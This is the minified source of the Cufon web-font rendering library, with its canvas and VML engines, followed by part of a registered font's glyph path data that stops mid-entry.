/*
 * Copyright (c) 2009 Simo Kinnunen.
 * Licensed under the MIT license.
 */
var Cufon=(function(){var L=function(){return L.replace.apply(null,arguments)};var W=L.DOM={ready:(function(){var b=false,d={loaded:1,complete:1};var a=[],c=function(){if(b){return}b=true;for(var e;e=a.shift();e()){}};if(document.addEventListener){document.addEventListener("DOMContentLoaded",c,false);window.addEventListener("pageshow",c,false)}if(!window.opera&&document.readyState){(function(){d[document.readyState]?c():setTimeout(arguments.callee,10)})()}if(document.readyState&&document.createStyleSheet){(function(){try{document.body.doScroll("left");c()}catch(f){setTimeout(arguments.callee,1)}})()}P(window,"load",c);return function(e){if(!arguments.length){c()}else{b?e():a.push(e)}}})()};var M=L.CSS={Size:function(b,a){this.value=parseFloat(b);this.unit=String(b).match(/[a-z%]*$/)[0]||"px";this.convert=function(c){return c/a*this.value};this.convertFrom=function(c){return c/this.value*a};this.toString=function(){return this.value+this.unit}},color:I(function(b){var a={};a.color=b.replace(/^rgba\((.*?),\s*([\d.]+)\)/,function(d,c,e){a.opacity=parseFloat(e);return"rgb("+c+")"});return a}),getStyle:function(b){var a=document.defaultView;if(a&&a.getComputedStyle){return new A(a.getComputedStyle(b,null))}if(b.currentStyle){return new A(b.currentStyle)}return new A(b.style)},gradient:I(function(e){var f={id:e,type:e.match(/^-([a-z]+)-gradient\(/)[1],stops:[]},b=e.substr(e.indexOf("(")).match(/([\d.]+=)?(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)/ig);for(var d=0,a=b.length,c;d<a;++d){c=b[d].split("=",2).reverse();f.stops.push([c[1]||d/(a-1),c[0]])}return f}),quotedList:I(function(d){var c=[],b=/\s*((["'])([\s\S]*?[^\\])\2|[^,]+)\s*/g,a;while(a=b.exec(d)){c.push(a[3]||a[1])}return c}),recognizesMedia:I(function(d){var c=document.createElement("style"),b,a;c.type="text/css";c.media=d;b=F("head")[0];b.insertBefore(c,b.firstChild);a=!!(c.sheet||c.styleSheet);b.removeChild(c);return a}),supports:function(c,b){var a=document.createElement("span").style;if(a[c]===undefined){return false}a[c]=b;return a[c]===b},textAlign:function(d,c,a,b){if(c.get("textAlign")=="right"){if(a>0){d=" "+d}}else{if(a<b-1){d+=" "}}return d},textDecoration:function(f,e){if(!e){e=this.getStyle(f)}var b={underline:null,overline:null,"line-through":null};for(var a=f;a.parentNode&&a.parentNode.nodeType==1;){var d=true;for(var c in b){if(!J(b,c)||b[c]){continue}if(e.get("textDecoration").indexOf(c)!=-1){b[c]=e.get("color")}d=false}if(d){break}e=this.getStyle(a=a.parentNode)}return b},textShadow:I(function(e){if(e=="none"){return null}var d=[],f={},a,b=0;var c=/(#[a-f0-9]+|[a-z]+\(.*?\)|[a-z]+)|(-?[\d.]+[a-z%]*)|,/ig;while(a=c.exec(e)){if(a[0]==","){d.push(f);f={},b=0}else{if(a[1]){f.color=a[1]}else{f[["offX","offY","blur"][b++]]=a[2]}}}d.push(f);return d}),textTransform:function(b,a){return b[{uppercase:"toUpperCase",lowercase:"toLowerCase"}[a.get("textTransform")]||"toString"]()},whiteSpace:(function(){var a={inline:1,"inline-block":1,"run-in":1};return function(d,b,c){if(a[b.get("display")]){return d}if(!c.previousSibling){d=d.replace(/^\s+/,"")}if(!c.nextSibling){d=d.replace(/\s+$/,"")}return d}})()};M.ready=(function(){var c=!M.recognizesMedia("all"),b=false;var a=[],e=function(){c=true;for(var h;h=a.shift();h()){}};var f=F("link"),g={stylesheet:1};function d(){var j,h,k;for(h=0;k=f[h];++h){if(k.disabled||!g[k.rel.toLowerCase()]||!M.recognizesMedia(k.media||"screen")){continue}j=k.sheet||k.styleSheet;if(!j||j.disabled){return false}}return true}W.ready(function(){if(!b){b=M.getStyle(document.body).isUsable()}if(c||(b&&d())){e()}else{setTimeout(arguments.callee,10)}});return function(h){if(c){h()}else{a.push(h)}}})();function R(b){var a=this.face=b.face;this.glyphs=b.glyphs;this.w=b.w;this.baseSize=parseInt(a["units-per-em"],10);this.family=a["font-family"].toLowerCase();this.weight=a["font-weight"];this.style=a["font-style"]||"normal";this.viewBox=(function(){var d=a.bbox.split(/\s+/);var c={minX:parseInt(d[0],10),minY:parseInt(d[1],10),maxX:parseInt(d[2],10),maxY:parseInt(d[3],10)};c.width=c.maxX-c.minX,c.height=c.maxY-c.minY;c.toString=function(){return[this.minX,this.minY,this.width,this.height].join(" ")};return c})();this.ascent=-parseInt(a.ascent,10);this.descent=-parseInt(a.descent,10);this.height=-this.ascent+this.descent}function E(){var b={},a={oblique:"italic",italic:"oblique"};this.add=function(c){(b[c.style]||(b[c.style]={}))[c.weight]=c};this.get=function(g,h){var f=b[g]||b[a[g]]||b.normal||b.italic||b.oblique;if(!f){return null}h={normal:400,bold:700}[h]||parseInt(h,10);if(f[h]){return f[h]}var d={1:1,99:0}[h%100],j=[],e,c;if(d===undefined){d=h>400}if(h==500){h=400}for(var i in f){if(!J(f,i)){continue}i=parseInt(i,10);if(!e||i<e){e=i}if(!c||i>c){c=i}j.push(i)}if(h<e){h=e}if(h>c){h=c}j.sort(function(l,k){return(d?(l>h&&k>h)?l<k:l>k:(l<h&&k<h)?l>k:l<k)?-1:1});return f[j[0]]}}function Q(){function c(e,f){if(e.contains){return e.contains(f)}return e.compareDocumentPosition(f)&16}function a(g){var f=g.relatedTarget;if(!f||c(this,f)){return}b(this)}function d(f){b(this)}function b(e){setTimeout(function(){L.replace(e,D.get(e).options,true)},10)}this.attach=function(e){if(e.onmouseenter===undefined){P(e,"mouseover",a);P(e,"mouseout",a)}else{P(e,"mouseenter",d);P(e,"mouseleave",d)}}}function T(){var b=[],c={};function a(g){var d=[],f;for(var e=0;f=g[e];++e){d[e]=b[c[f]]}return d}this.add=function(e,d){c[e]=b.push(d)-1};this.repeat=function(){var d=arguments.length?a(arguments):b,e;for(var f=0;e=d[f++];){L.replace(e[0],e[1],true)}}}function Z(){var c={},a=0;function b(d){return d.cufid||(d.cufid=++a)}this.get=function(d){var e=b(d);return c[e]||(c[e]={})}}function A(a){var c={},b={};this.extend=function(d){for(var e in d){if(J(d,e)){c[e]=d[e]}}return this};this.get=function(d){return c[d]!=undefined?c[d]:a[d]};this.getSize=function(e,d){return b[e]||(b[e]=new M.Size(this.get(e),d))};this.isUsable=function(){return !!a}}function P(b,a,c){if(b.addEventListener){b.addEventListener(a,c,false)}else{if(b.attachEvent){b.attachEvent("on"+a,function(){return c.call(b,window.event)})}}}function U(b,a){var c=D.get(b);if(c.options){return b}if(a.hover&&a.hoverables[b.nodeName.toLowerCase()]){B.attach(b)}c.options=a;return b}function I(a){var b={};return function(c){if(!J(b,c)){b[c]=a.apply(null,arguments)}return b[c]}}function C(f,e){if(!e){e=M.getStyle(f)}var b=M.quotedList(e.get("fontFamily").toLowerCase()),d;for(var c=0,a=b.length;c<a;++c){d=b[c];if(H[d]){return H[d].get(e.get("fontStyle"),e.get("fontWeight"))}}return null}function F(a){return document.getElementsByTagName(a)}function J(b,a){return b.hasOwnProperty(a)}function G(){var a={},c,e;for(var d=0,b=arguments.length;c=arguments[d],d<b;++d){for(e in c){if(J(c,e)){a[e]=c[e]}}}return a}function N(d,n,b,o,e,c){var m=o.separate;if(m=="none"){return Y[o.engine].apply(null,arguments)}var k=document.createDocumentFragment(),g;var h=n.split(O[m]),a=(m=="words");if(a&&S){if(/^\s/.test(n)){h.unshift("")}if(/\s$/.test(n)){h.push("")}}for(var j=0,f=h.length;j<f;++j){g=Y[o.engine](d,a?M.textAlign(h[j],b,j,f):h[j],b,o,e,c,j<f-1);if(g){k.appendChild(g)}}return k}function K(b,j){var c,a,d,g,f,i;for(d=U(b,j).firstChild;d;d=f){g=d.nodeType;f=d.nextSibling;i=false;if(g==1){if(!d.firstChild){continue}if(!/cufon/.test(d.className)){arguments.callee(d,j);continue}else{i=true}}else{if(g!=3){continue}}if(!a){a=M.getStyle(b).extend(j)}if(!c){c=C(b,a)}if(!c){continue}if(i){Y[j.engine](c,null,a,j,d,b);continue}var h=M.whiteSpace(d.data,a,d);if(h===""){continue}var e=N(c,h,a,j,d,b);if(e){d.parentNode.replaceChild(e,d)}else{d.parentNode.removeChild(d)}}}var S=" ".split(/\s+/).length==0;var D=new Z();var B=new Q();var X=new T();var Y={},H={},V={enableTextDecoration:false,engine:null,hover:false,hoverables:{a:true},printable:true,selector:(window.Sizzle||(window.jQuery&&function(a){return jQuery(a)})||(window.dojo&&dojo.query)||(window.$$&&function(a){return $$(a)})||(window.$&&function(a){return $(a)})||(document.querySelectorAll&&function(a){return document.querySelectorAll(a)})||F),separate:"words",textShadow:"none"};var O={words:/[^\S\u00a0]+/,characters:""};L.now=function(){W.ready();return L};L.refresh=function(){X.repeat.apply(X,arguments);return L};L.registerEngine=function(b,a){if(!a){return L}Y[b]=a;return L.set("engine",b)};L.registerFont=function(c){var a=new R(c),b=a.family;if(!H[b]){H[b]=new E()}H[b].add(a);return L.set("fontFamily",'"'+b+'"')};L.replace=function(c,b,a){b=G(V,b);if(!b.engine){return L}if(typeof b.textShadow=="string"){b.textShadow=M.textShadow(b.textShadow)}if(typeof b.color=="string"&&/^-/.test(b.color)){b.textGradient=M.gradient(b.color)}if(!a){X.add(c,arguments)}if(c.nodeType||typeof c=="string"){c=[c]}M.ready(function(){for(var e=0,d=c.length;e<d;++e){var f=c[e];if(typeof f=="string"){L.replace(b.selector(f),b,true)}else{K(f,b)}}});return L};L.set=function(a,b){V[a]=b;return L};return L})();Cufon.registerEngine("canvas",(function(){var B=document.createElement("canvas");if(!B||!B.getContext||!B.getContext.apply){return}B=null;var A=Cufon.CSS.supports("display","inline-block");var E=!A&&(document.compatMode=="BackCompat"||/frameset|transitional/i.test(document.doctype.publicId));var F=document.createElement("style");F.type="text/css";F.appendChild(document.createTextNode((".cufon-canvas{text-indent:0;}@media screen,projection{.cufon-canvas{display:inline;display:inline-block;position:relative;vertical-align:middle;"+(E?"":"font-size:1px;line-height:1px;")+"}.cufon-canvas .cufon-alt{display:-moz-inline-box;display:inline-block;width:0;height:0;overflow:hidden;}"+(A?".cufon-canvas canvas{position:relative;}":".cufon-canvas canvas{position:absolute;}")+"}@media print{.cufon-canvas{padding:0;}.cufon-canvas canvas{display:none;}.cufon-canvas .cufon-alt{display:inline;}}").replace(/;/g,"!important;")));document.getElementsByTagName("head")[0].appendChild(F);function D(O,H){var M=0,L=0;var G=[],N=/([mrvxe])([^a-z]*)/g,J;generate:for(var I=0;J=N.exec(O);++I){var K=J[2].split(",");switch(J[1]){case"v":G[I]={m:"bezierCurveTo",a:[M+~~K[0],L+~~K[1],M+~~K[2],L+~~K[3],M+=~~K[4],L+=~~K[5]]};break;case"r":G[I]={m:"lineTo",a:[M+=~~K[0],L+=~~K[1]]};break;case"m":G[I]={m:"moveTo",a:[M=~~K[0],L=~~K[1]]};break;case"x":G[I]={m:"closePath"};break;case"e":break generate}H[G[I].m].apply(H,G[I].a)}return G}function C(K,J){for(var I=0,H=K.length;I<H;++I){var G=K[I];J[G.m].apply(J,G.a)}}return function(AD,Z,u,V,d,AE){var I=(Z===null);if(I){Z=d.alt}var b=AD.viewBox;var K=u.getSize("fontSize",AD.baseSize);var s=u.get("letterSpacing");s=(s=="normal")?0:K.convertFrom(parseInt(s,10));var c=0,t=0,r=0,X=0;var a=V.textShadow,p=[];if(a){for(var AC=a.length;AC--;){var h=a[AC];var o=K.convertFrom(parseFloat(h.offX));var n=K.convertFrom(parseFloat(h.offY));p[AC]=[o,n];if(n<c){c=n}if(o>t){t=o}if(n>r){r=n}if(o<X){X=o}}}var AH=Cufon.CSS.textTransform(Z,u).split(""),T;var J=AD.glyphs,W,M,w;var G=0,P,f=[];for(var AC=0,AA=0,v=AH.length;AC<v;++AC){W=J[T=AH[AC]]||AD.missingGlyph;if(!W){continue}if(M){G-=w=M[T]||0;f[AA-1]-=w}G+=P=f[AA++]=~~(W.w||AD.w)+s;M=W.k}if(P===undefined){return null}t+=b.width-P;X+=b.minX;var U,L;if(I){U=d;L=d.firstChild}else{U=document.createElement("span");U.className="cufon cufon-canvas";U.alt=Z;L=document.createElement("canvas");U.appendChild(L);if(V.printable){var z=document.createElement("span");z.className="cufon-alt";z.appendChild(document.createTextNode(Z));U.appendChild(z)}}var AI=U.style;var m=L.style;var H=K.convert(b.height);var AG=Math.ceil(H);var q=AG/H;L.width=Math.ceil(K.convert(G*q+t-X));L.height=Math.ceil(K.convert(b.height-c+r));c+=b.minY;m.top=Math.round(K.convert(c-AD.ascent))+"px";m.left=Math.round(K.convert(X))+"px";var S=Math.ceil(K.convert(G*q))+"px";if(A){AI.width=S;AI.height=K.convert(AD.height)+"px"}else{AI.paddingLeft=S;AI.paddingBottom=(K.convert(AD.height)-1)+"px"}var AF=L.getContext("2d"),e=H/b.height;AF.scale(e,e*q);AF.translate(-X,-c);AF.lineWidth=AD.face["underline-thickness"];AF.save();function N(i,g){AF.strokeStyle=g;AF.beginPath();AF.moveTo(0,i);AF.lineTo(G,i);AF.stroke()}var O=V.enableTextDecoration?Cufon.CSS.textDecoration(AE,u):{};if(O.underline){N(-AD.face["underline-position"],O.underline)}if(O.overline){N(AD.ascent,O.overline)}function AB(){AF.scale(q,1);for(var x=0,k=0,g=AH.length;x<g;++x){var y=J[AH[x]]||AD.missingGlyph;if(!y){continue}if(y.d){AF.beginPath();if(y.code){C(y.code,AF)}else{y.code=D("m"+y.d,AF)}AF.fill()}AF.translate(f[k++],0)}AF.restore()}if(a){for(var AC=a.length;AC--;){var h=a[AC];AF.save();AF.fillStyle=h.color;AF.translate.apply(AF,p[AC]);AB()}}var R=V.textGradient;if(R){var Y=R.stops,Q=AF.createLinearGradient(0,b.minY,0,b.maxY);for(var AC=0,v=Y.length;AC<v;++AC){Q.addColorStop.apply(Q,Y[AC])}AF.fillStyle=Q}else{AF.fillStyle=u.get("color")}AB();if(O["line-through"]){N(-AD.descent,O["line-through"])}return U}})());Cufon.registerEngine("vml",(function(){if(!document.namespaces){return}if(document.namespaces.cvml==null){document.namespaces.add("cvml","urn:schemas-microsoft-com:vml")}var B=document.createElement("cvml:shape");B.style.behavior="url(#default#VML)";if(!B.coordsize){return}B=null;document.write(('<style type="text/css">.cufon-vml-canvas{text-indent:0;}@media screen{cvml\\:shape,cvml\\:fill,cvml\\:shadow{behavior:url(#default#VML);display:block;antialias:true;position:absolute;}.cufon-vml-canvas{position:absolute;text-align:left;}.cufon-vml{display:inline-block;position:relative;vertical-align:middle;}.cufon-vml .cufon-alt{position:absolute;left:-10000in;font-size:1px;}a .cufon-vml{cursor:pointer}}@media print{.cufon-vml *{display:none;}.cufon-vml .cufon-alt{display:inline;}}</style>').replace(/;/g,"!important;"));function C(F,G){return A(F,/(?:em|ex|%)$/i.test(G)?"1em":G)}function A(I,J){if(/px$/i.test(J)){return parseFloat(J)}var H=I.style.left,G=I.runtimeStyle.left;I.runtimeStyle.left=I.currentStyle.left;I.style.left=J;var F=I.style.pixelLeft;I.style.left=H;I.runtimeStyle.left=G;return F}var E={};function D(K){var L=K.id;if(!E[L]){var I=K.stops,J=document.createElement("cvml:fill"),F=[];J.type="gradient";J.angle=180;J.focus="0";J.method="sigma";J.color=I[0][1];for(var H=1,G=I.length-1;H<G;++H){F.push(I[H][0]*100+"% "+I[H][1])}J.colors=F.join(",");J.color2=I[G][1];E[L]=J}return E[L]}return function(AB,b,v,Y,f,AC,t){var I=(b===null);if(I){b=f.alt}var d=AB.viewBox;var K=v.computedFontSize||(v.computedFontSize=new Cufon.CSS.Size(C(AC,v.get("fontSize"))+"px",AB.baseSize));var s=v.computedLSpacing;if(s==undefined){s=v.get("letterSpacing");v.computedLSpacing=s=(s=="normal")?0:~~K.convertFrom(A(AC,s))}var V,L;if(I){V=f;L=f.firstChild}else{V=document.createElement("span");V.className="cufon cufon-vml";V.alt=b;L=document.createElement("span");L.className="cufon-vml-canvas";V.appendChild(L);if(Y.printable){var y=document.createElement("span");y.className="cufon-alt";y.appendChild(document.createTextNode(b));V.appendChild(y)}if(!t){V.appendChild(document.createElement("cvml:shape"))}}var AH=V.style;var n=L.style;var G=K.convert(d.height),AE=Math.ceil(G);var r=AE/G;var q=d.minX,p=d.minY;n.height=AE;n.top=Math.round(K.convert(p-AB.ascent));n.left=Math.round(K.convert(q));AH.height=K.convert(AB.height)+"px";var P=Y.enableTextDecoration?Cufon.CSS.textDecoration(AC,v):{};var a=v.get("color");var AG=Cufon.CSS.textTransform(b,v).split(""),U;var J=AB.glyphs,Z,M,x;var F=0,g=[],o=0,Q;var S,c=Y.textShadow;for(var AA=0,z=0,w=AG.length;AA<w;++AA){Z=J[U=AG[AA]]||AB.missingGlyph;if(!Z){continue}if(M){F-=x=M[U]||0;g[z-1]-=x}F+=Q=g[z++]=~~(Z.w||AB.w)+s;M=Z.k}if(Q===undefined){return null}var T=-q+F+(d.width-Q);var AF=K.convert(T*r),u=Math.round(AF);var m=T+","+d.height,H;var e="r"+m+"ns";var R=Y.textGradient&&D(Y.textGradient);for(AA=0,z=0;AA<w;++AA){Z=J[AG[AA]]||AB.missingGlyph;if(!Z){continue}if(I){S=L.childNodes[z];while(S.firstChild){S.removeChild(S.firstChild)}}else{S=document.createElement("cvml:shape");L.appendChild(S)}S.stroked="f";S.coordsize=m;S.coordorigin=H=(q-o)+","+p;S.path=(Z.d?"m"+Z.d+"xe":"")+"m"+H+e;S.fillcolor=a;if(R){S.appendChild(R.cloneNode(false))}var AD=S.style;AD.width=u;AD.height=AE;if(c){var O=c[0],N=c[1];var X=Cufon.CSS.color(O.color),W;var h=document.createElement("cvml:shadow");h.on="t";h.color=X.color;h.offset=O.offX+","+O.offY;if(N){W=Cufon.CSS.color(N.color);h.type="double";h.color2=W.color;h.offset2=N.offX+","+N.offY}h.opacity=X.opacity||(W&&W.opacity)||1;S.appendChild(h)}o+=g[z++]}AH.width=Math.max(Math.ceil(K.convert(F*r)),0);return V}})());

Cufon.registerFont((function(f){_cufon_bridge_={p:[{"d":"108,-123v29,0,47,-22,47,-52v0,-28,-19,-51,-46,-51v-31,0,-50,20,-50,51v0,32,18,53,49,52xm110,-260v50,0,85,35,85,86v0,43,-73,144,-106,190r-32,-16r74,-97v-55,26,-113,-16,-113,-75v0,-53,38,-88,92,-88"},{"d":"112,-140v-64,0,-44,78,-47,140r-39,0r0,-272r36,0r0,133v15,-22,30,-33,65,-33v84,0,55,97,60,172r-38,0v-6,-52,21,-140,-37,-140","w":211},{"d":"69,-252r29,0r0,97r-29,0r0,-97xm15,-252r29,0r0,97r-29,0r0,-97","w":113},{"d":"85,0r0,-118r-87,-139r44,0r65,108v18,-40,45,-71,66,-108r42,0r-89,139r0,118r-41,0","w":213,"k":{"u":38,"o":40,"i":6,"e":40,"a":40,"O":13,"C":6,"A":20,";":38,":":38,".":48,"-":43,",":48}},{"d":"14,-83v0,-69,76,-109,137,-79r0,43v-27,-36,-104,-20,-97,35v-8,56,71,73,97,35r0,44v-60,34,-137,-7,-137,-78","w":163},{"d":"114,-238v-22,-12,-44,-1,-44,32r0,39r40,0r0,34r-40,0r0,133r-38,0r0,-133r-30,0r0,-34r30,0v-8,-70,11,-127,82,-105r0,34","w":110,"k":{".":13,",":13}},{"d":"140,-184v0,-37,-29,-37,-69,-37r0,71v41,-1,69,2,69,-34xm183,-187v-2,62,-43,77,-114,72r0,115r-39,0r0,-257v79,-2,155,-6,153,70","w":191,"k":{"s":6,"r":6,"o":13,"n":6,"e":13,"a":13,"A":20,";":16,":":16,".":86,"-":28,",":86}},{"d":"30,0r0,-257r41,0r0,220r94,0r0,37r-135,0","w":169,"k":{"y":13,"Y":26,"W":20,"V":20,"U":6,"T":20,"O":13,";":-7,":":-7,".":-7,"-":6,",":-7}},{"d":"106,-140v-59,-1,-37,82,-41,140r-39,0r0,-167r36,0r0,28v16,-40,99,-48,112,-1v28,-50,134,-45,116,39r0,101r-38,0v-7,-49,22,-140,-32,-140v-60,0,-37,84,-42,140r-39,0v-6,-51,20,-139,-33,-140","w":315},{"d":"109,-139v-30,0,-47,23,-46,55v0,32,18,57,47,57v32,0,46,-23,46,-55v-1,-33,-15,-57,-47,-57xm120,7v-27,0,-44,-11,-55,-29r0,22r-39,0r0,-272r39,0r0,133v7,-21,28,-34,56,-33v46,0,74,39,74,89v0,52,-26,90,-75,90","w":209,"k":{"-":-7}},{"d":"38,0r-42,0r63,-90r-54,-77r42,0v12,18,25,35,35,55v9,-19,24,-37,35,-55r41,0r-54,78r63,89r-42,0v-14,-21,-34,-45,-44,-67v-12,26,-29,44,-43,67","w":163,"k":{"-":11}},{"d":"129,-174r-65,93r64,0xm128,0r0,-52r-123,0r150,-208r11,0r0,179r32,0r0,29r-32,0r0,52r-38,0"},{"d":"68,45r34,0r0,28r-67,0r0,-336r67,0r0,27r-34,0r0,281","w":109},{"d":"193,-88v0,95,-132,127,-179,57r27,-31v11,19,28,34,55,35v33,0,57,-26,57,-59v0,-60,-83,-74,-115,-36r-10,-2r32,-131r122,0r0,34r-97,0r-15,57v58,-27,123,11,123,76"},{"d":"98,-232v-20,1,-31,14,-31,36r-30,0v-5,-39,22,-67,61,-67v37,0,63,23,62,60v9,55,-81,59,-88,95v0,12,12,22,24,22v17,0,23,-11,25,-27r31,0v1,37,-20,56,-56,58v-47,2,-75,-52,-46,-87v9,-21,76,-30,77,-62v1,-16,-13,-28,-29,-28xm93,7v-13,1,-23,-11,-23,-23v-1,-12,11,-24,23,-23v13,0,23,10,23,23v0,12,-11,24,-23,23","w":195},{"d":"3,0r131,-222r-109,0r0,-35r174,0r-130,220r131,0r0,37r-197,0","w":207,"k":{";":-7,":":-7,".":-7,"-":6,",":-7}},{"d":"102,-172v55,0,88,35,85,94r-133,0v-4,60,84,64,99,17r32,18v-16,30,-41,49,-83,50v-53,1,-88,-37,-88,-90v0,-50,37,-89,88,-89xm147,-103v1,-36,-48,-47,-75,-28v-8,6,-13,15,-16,28r91,0","w":200,"k":{"-":-7}},{"d":"113,-222r0,222r-42,0r0,-222r-69,0r0,-35r179,0r0,35r-68,0","w":183,"k":{"y":36,"w":36,"u":36,"s":36,"r":29,"o":36,"e":36,"c":36,"a":36,"O":13,"C":13,"A":26,";":23,":":23,".":46,"-":33,",":46}},{"d":"191,-76v0,47,-30,71,-73,76r0,30r-18,0r0,-30v-41,-2,-67,-20,-76,-56r33,-14v6,19,19,31,43,33r0,-80v-38,-17,-69,-30,-69,-74v0,-41,29,-64,69,-68r0,-20r18,0r0,20v32,4,55,15,64,41r-32,16v-7,-11,-17,-19,-32,-22r0,71v45,23,73,29,73,77xm100,-223v-34,5,-30,55,0,63r0,-63xm118,-38v25,-3,39,-34,23,-55v-5,-6,-13,-11,-23,-17r0,72"},{"d":"218,-108v-37,0,-35,94,-1,94v22,0,27,-21,27,-47v0,-25,-5,-47,-26,-47xm218,7v-38,0,-58,-29,-58,-68v0,-39,20,-68,58,-68v38,0,57,27,57,68v0,40,-19,68,-57,68xm68,-125v-39,0,-58,-27,-58,-67v0,-41,21,-68,58,-68v38,1,57,27,57,68v0,40,-19,67,-57,67xm42,-192v0,25,5,47,25,47v21,0,26,-21,26,-47v0,-26,-5,-47,-25,-47v-21,0,-26,21,-26,47xm80,7r-24,0r150,-267r24,0","w":285},{"d":"0,0r83,-135r-73,-122r44,0r50,88v17,-31,36,-59,54,-88r43,0r-76,122r81,135r-46,0r-57,-99v-17,35,-40,66,-59,99r-44,0","w":205,"k":{"O":6,"C":6,";":6,":":6,".":-7,"-":18,",":-7}},{"d":"100,-27v28,0,46,-26,46,-57v0,-32,-15,-55,-46,-55v-30,0,-46,24,-46,57v0,32,14,55,46,55xm89,-172v28,-1,49,12,56,33r0,-28r38,0v-8,102,38,245,-85,245v-41,0,-75,-18,-76,-53r41,0v2,16,16,22,36,22v42,2,48,-27,46,-69v-13,17,-28,29,-55,29v-50,0,-76,-37,-76,-90v0,-50,28,-89,75,-89","w":209,"k":{".":6,"-":6,",":6}},{"d":"105,-225v-24,0,-35,31,-17,45r12,16v13,-8,30,-16,30,-36v0,-14,-10,-25,-25,-25xm58,-90v-25,36,20,79,61,56v9,-5,18,-10,28,-18r-57,-65v-11,9,-27,19,-32,27xm230,-89v-8,15,-21,29,-34,40r43,49r-48,0r-21,-24v-43,49,-164,38,-159,-43v2,-41,26,-58,57,-78v-13,-14,-28,-28,-28,-54v-1,-35,30,-58,66,-58v37,0,64,20,63,54v-1,35,-22,48,-50,66r54,62v11,-12,22,-25,33,-40","w":241},{"d":"35,0r0,-133r-29,0r0,-34r29,0r0,-63r38,0r0,63r30,0r0,34r-30,0r0,133r-38,0","w":109,"k":{"-":8}},{"d":"77,-198v-3,-56,24,-63,77,-62r0,32v-80,-21,-4,131,-77,135v42,4,36,51,36,97v0,33,9,39,41,38r0,31v-51,1,-77,-6,-77,-61v0,-48,8,-98,-49,-90r0,-31v54,8,51,-39,49,-89","w":180},{"d":"95,0r0,-222r-53,0r16,-33r75,0r0,255r-38,0"},{"d":"-1,-257r41,0r63,170v19,-63,44,-120,65,-181r69,182v15,-61,41,-114,60,-171r42,0r-100,267r-71,-183v-20,64,-47,122,-70,183","w":338,"k":{"y":6,"u":13,"r":13,"o":20,"e":20,"a":20,"A":6,";":21,":":21,".":44,"-":21,",":44}},{"d":"111,10r-115,-267r44,0r66,159v2,7,4,13,5,19v20,-63,48,-119,72,-178r43,0","w":222,"k":{"y":10,"u":20,"o":20,"e":20,"a":20,"O":6,"A":6,";":24,":":24,".":60,"-":29,",":60}},{"d":"54,-44r35,13r-46,94r-23,-9","w":108},{"d":"134,7v-70,0,-106,-34,-106,-104r0,-160r42,0v8,88,-33,226,64,226v97,0,55,-138,64,-226r42,0r0,160v0,70,-36,104,-106,104","w":267,"k":{"A":6,";":11,":":11,".":21,"-":10,",":21}},{"d":"202,-111v29,-1,46,-13,67,-27r0,33v-20,13,-40,23,-67,24v-34,1,-78,-25,-103,-23v-29,2,-45,13,-68,28r0,-33v21,-14,40,-24,68,-25v35,-2,75,24,103,23","w":299},{"w":108},{"d":"106,-27v28,0,51,-26,51,-56v0,-28,-23,-55,-51,-55v-28,0,-52,26,-52,55v0,31,24,56,52,56xm105,7v-53,0,-91,-36,-91,-90v0,-54,37,-89,91,-89v56,0,93,35,93,89v0,55,-38,90,-93,90","w":211,"k":{"-":-7}},{"d":"0,55r180,0r0,30r-180,0r0,-30","w":180},{"d":"243,-20v-23,1,-37,-8,-37,-30v-11,19,-26,29,-53,30v-37,0,-54,-22,-55,-59v-1,-51,35,-99,83,-98v22,0,35,9,43,25r10,-19r27,0r-27,112v0,9,7,14,16,14v42,-6,63,-44,64,-89v1,-62,-53,-101,-119,-100v-92,2,-146,55,-149,143v-2,74,57,122,135,120v44,0,80,-13,108,-33r12,17v-32,23,-69,40,-119,40v-98,0,-165,-49,-165,-145v0,-105,74,-167,179,-167v85,0,147,42,147,125v0,63,-36,111,-100,114xm130,-78v0,36,37,46,60,24v17,-16,20,-44,27,-70v-4,-18,-13,-31,-33,-31v-32,0,-54,41,-54,77","w":360},{"d":"134,-183v0,-35,-24,-39,-63,-38r0,73v39,0,63,0,63,-35xm177,-187v0,42,-21,66,-59,70r88,117r-47,0r-86,-115r-4,0r0,115r-39,0r0,-257v77,-3,147,-3,147,70","w":201,"k":{"u":6,"o":6,"e":6,"a":6,"Y":6,"-":10}},{"d":"100,-27v28,0,46,-26,46,-57v0,-32,-15,-55,-46,-55v-30,0,-46,24,-46,57v0,32,14,55,46,55xm89,-172v28,-1,49,12,56,33r0,-133r38,0r0,272r-38,0r0,-22v-13,17,-28,29,-55,29v-50,0,-76,-37,-76,-90v0,-50,28,-89,75,-89","w":209},{"d":"20,-68v0,-36,18,-59,46,-68v-66,-24,-35,-136,42,-124v77,-12,110,100,43,124v27,8,46,33,46,67v0,49,-36,76,-89,76v-51,0,-88,-27,-88,-75xm147,-190v1,-23,-15,-36,-38,-36v-23,0,-40,13,-39,36v0,21,15,35,38,34v24,0,39,-11,39,-34xm60,-72v0,28,19,45,48,45v29,0,49,-16,49,-45v0,-29,-20,-45,-49,-45v-28,0,-48,17,-48,45"},{"d":"30,0r0,-257r42,0r0,257r-42,0","w":102},{"d":"141,-46v4,65,-116,70,-134,16r32,-17v2,28,63,37,65,3v-10,-33,-88,-29,-88,-79v0,-55,97,-68,117,-22r-27,18v-5,-21,-51,-24,-52,2v10,32,94,28,87,79","w":153,"k":{"-":-7}},{"d":"89,-172v28,-1,49,12,56,33r0,-28r38,0r0,167r-38,0r0,-22v-13,17,-28,29,-55,29v-50,0,-76,-37,-76,-90v0,-50,28,-89,75,-89xm100,-27v28,0,46,-26,46,-57v0,-32,-15,-55,-46,-55v-30,0,-46,24,-46,57v0,32,14,55,46,55","w":209},{"d":"47,-215v-12,0,-24,-10,-24,-24v0,-12,12,-24,24,-23v14,0,24,10,24,23v1,14,-11,24,-24,24xm28,0r0,-167r38,0r0,167r-38,0","w":94},{"d":"100,-261v-48,84,-50,247,0,330r-29,9v-54,-87,-55,-260,0,-347","w":109},{"d":"100,-27v29,0,47,-26,46,-57v0,-32,-15,-55,-46,-55v-30,0,-46,24,-46,57v0,32,14,55,46,55xm89,-172v28,-1,49,12,56,33r0,-28r38,0r0,245r-38,0r0,-100v-13,17,-28,29,-55,29v-50,0,-76,-37,-76,-90v0,-50,28,-89,75,-89","w":209},{"d":"15,-252r29,0r0,97r-29,0r0,-97","w":58},{"d":"161,-257r38,0r87,99r-36,0r-70,-70r-70,70r-37,0","w":360},{"d":"156,-32v56,0,94,-40,94,-96v0,-58,-37,-97,-94,-97v-57,0,-94,39,-94,97v0,57,36,96,94,96xm156,-263v81,0,137,53,137,135v0,82,-56,135,-137,135v-82,0,-138,-53,-138,-135v0,-83,55,-135,138,-135","w":311,"k":{"Y":13,"X